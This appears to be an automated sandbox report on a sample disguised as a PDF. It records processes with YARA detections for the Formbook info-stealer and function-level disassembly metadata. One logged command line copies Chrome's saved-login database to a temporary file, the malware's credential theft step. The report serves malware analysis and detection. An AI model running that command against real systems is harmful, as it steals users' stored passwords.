Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:25:09
Start date:	22/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000008.00000002.3767102018.0000000010A5F000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	11:25:11
Start date:	22/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:25:12
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0xe90000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	11:25:17
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:25:18
Start date:	22/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:31:03
Start date:	22/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.3%
Total number of Nodes:	981
Total number of Limit Nodes:	48

Executed Functions

Function 00007FF773C61460 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C6146F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614AD
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614D9
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614EA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614F9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C61590
GetProcessAffinityMask.KERNEL32 ref: 00007FF773C615A3

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
Opcode ID: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
Instruction ID: 13bdea4bb41cb6a1f4785b5adc762ee5044f75f709ce6a01bfd1e6520869331f
Opcode Fuzzy Hash: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
Instruction Fuzzy Hash: E9515C73A3CA46C6EA91AF65E850169F3A1FB44789FC44032D94EAB395EF2CE454C720

Function 00007FF773C7D16A Relevance: 9.5, APIs: 4, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF773C7D1B8

Strings

END, xrefs: 00007FF773C7D73A

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID: END
API String ID: 456121617-2522575163
Opcode ID: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
Instruction ID: 1b5229edf5d2d9759f3188edd9969a8e73fe59a80e14b2a64521f23126661339
Opcode Fuzzy Hash: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
Instruction Fuzzy Hash: 18829833E3DB4686EAD0BBA8A844274B3A0AF45B95F944236C94D633E4DF3CE455C360

Function 00007FF773C78830 Relevance: 3.5, APIs: 2, Instructions: 952COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF773C789EC
LeaveCriticalSection.KERNEL32 ref: 00007FF773C78A03

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
Instruction ID: 83d2e5893211101837aaaed5874c4459d3e75a044e8aece99d44667170a7ea57
Opcode Fuzzy Hash: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
Instruction Fuzzy Hash: 3FB23C63A3DB4685EE90AB64E850279B7A4FF44B84F944636DE4C277A4DF3CE461C320

Function 00007FF773C69340 Relevance: 2.7, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Creation of WaitForGCEvent failed, xrefs: 00007FF773C696C1
TraceGC is not turned on, xrefs: 00007FF773C69346

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
API String ID: 133006248-518909315
Opcode ID: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
Instruction ID: d34a57f4efc1e7e54e26083013080298cc1b6b8f0be809c7018d09ca94d2b4f1
Opcode Fuzzy Hash: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
Instruction Fuzzy Hash: 35B16D23E3DB4682FAD1BBA4A451279F291AF45788FC40276D58E273E2DF2DF0518360

Function 00007FF773C7DFD0 Relevance: 1.9, Strings: 1, Instructions: 685COMMON

Download Yara Rule

Strings

%_, xrefs: 00007FF773C7E0D6, 00007FF773C7E133

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID: %_
API String ID: 0-4145416222
Opcode ID: ab9d3395acc446df8bbb42c9f9c476036a8486221088c5072eea3ff1e419bc9a
Instruction ID: b7bb931ff0a8140df93203689ec6fafd5bbec9cc3e076621048c528e9c481848
Opcode Fuzzy Hash: ab9d3395acc446df8bbb42c9f9c476036a8486221088c5072eea3ff1e419bc9a
Instruction Fuzzy Hash: 9962BF73A3C64686EAE5AB75A441339F7A1BF45785F908136DD4E733A0EF3CA460C620

Function 00007FF773CE8FB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32 ref: 00007FF773CE9026

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
Instruction ID: 358de722d05ce44588f026e6fcc33124811e8818d1ffe03dfd4b39dc326ea66f
Opcode Fuzzy Hash: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
Instruction Fuzzy Hash: C2219F33A39A9099D7A4EF65EC015E977A4FB48398F900236FE4D93A89DF38D491C350

Function 00007FF773C82370 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: c0ad0a1e25142008f3637e5da2c3db878e0901c6b4a0cb550b565114e147fb9e
Instruction ID: 7d50b972f858d0091c160398887052a70e94067a18dd7462ad9aa2eea54d5a11
Opcode Fuzzy Hash: c0ad0a1e25142008f3637e5da2c3db878e0901c6b4a0cb550b565114e147fb9e
Instruction Fuzzy Hash: F002A363E3C60A86FAD5ABA5A844278F7A2AF45780F944637D44D332A0DF3CB561C670

Function 00007FF773C80C50 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3843895f9c51ab2ff60a44597ddfe13e851c997bb974433d0a6811f98037c427
Instruction ID: d921069cd1e4f6beae492fffaaae74adb19dc96d4fe3830a2482770add3ea003
Opcode Fuzzy Hash: 3843895f9c51ab2ff60a44597ddfe13e851c997bb974433d0a6811f98037c427
Instruction Fuzzy Hash: 50F16123D3DB4785F6C1FB64A9512B5F2A2AF95344FD49336E44D312A2EF3D75A08220

Function 00007FF773C7C9B6 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

BEGIN, xrefs: 00007FF773C7CC04
.NET BGC, xrefs: 00007FF773C7CCC6
qX, xrefs: 00007FF773C7CAFA
condemned generation num: %d, xrefs: 00007FF773C7CB11
m, xrefs: 00007FF773C7CA3E

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID: .NET BGC$BEGIN$condemned generation num: %d$m$qX
API String ID: 0-2393834873
Opcode ID: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
Instruction ID: 485450ceca088c11425e8e9aae316166804191361c339ff7621b5c586391d5ae
Opcode Fuzzy Hash: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
Instruction Fuzzy Hash: CA225E23D3C68781F691BBA8A8402B4F7A0FF54755F849236D98C732A1DF3CB5A58360

Function 00007FF773C61010 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF773C6105B
IsProcessInJob.KERNEL32 ref: 00007FF773C6106B
QueryInformationJobObject.KERNEL32 ref: 00007FF773C6109B
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF773C61104
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF773C61143
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF773C6118C

Strings

@, xrefs: 00007FF773C61138
@, xrefs: 00007FF773C610EC
@, xrefs: 00007FF773C61181

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
Instruction ID: ec6e5b953ef1b336679daa52cef43ad403cd688eb006e1aadf94f233e1643002
Opcode Fuzzy Hash: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
Instruction Fuzzy Hash: C941723272CAC1C6EBA1DF51E4543AAB3A0FB48B94F844235DAAD53B88CF3DD4458B10

Function 00007FF773C5B820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF773C5474F,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B82B

Part of subcall function 00007FF773C61460: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C6146F
Part of subcall function 00007FF773C61460: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614AD
Part of subcall function 00007FF773C61460: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614D9
Part of subcall function 00007FF773C61460: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614EA
Part of subcall function 00007FF773C61460: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614F9

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF773C5474F,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B89D
GetProcessAffinityMask.KERNEL32 ref: 00007FF773C5B8B0
QueryInformationJobObject.KERNEL32 ref: 00007FF773C5B8FE

Strings

PROCESSOR_COUNT, xrefs: 00007FF773C5B866

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
String ID: PROCESSOR_COUNT
API String ID: 1701933505-4048346908
Opcode ID: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
Instruction ID: 39dc2bd8f916452c4822a990713b414842d6795bcf1d424073253428b46bb40e
Opcode Fuzzy Hash: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
Instruction Fuzzy Hash: B6317363B3CA4386EB94BB90D4802B9E7A1EF44798FD41036D68D666D5DF2CE409C760

Function 00007FF773C54740 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF773C5B820: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF773C5474F,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B82B
Part of subcall function 00007FF773C5B820: QueryInformationJobObject.KERNEL32 ref: 00007FF773C5B8FE

Part of subcall function 00007FF773C5B6C0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF773C54778,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C5B6D1

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C548BE

Strings

The required instruction sets are not supported by the current CPU., xrefs: 00007FF773C548AA
StressLogLevel, xrefs: 00007FF773C54830
TotalStressLogSize, xrefs: 00007FF773C547F5

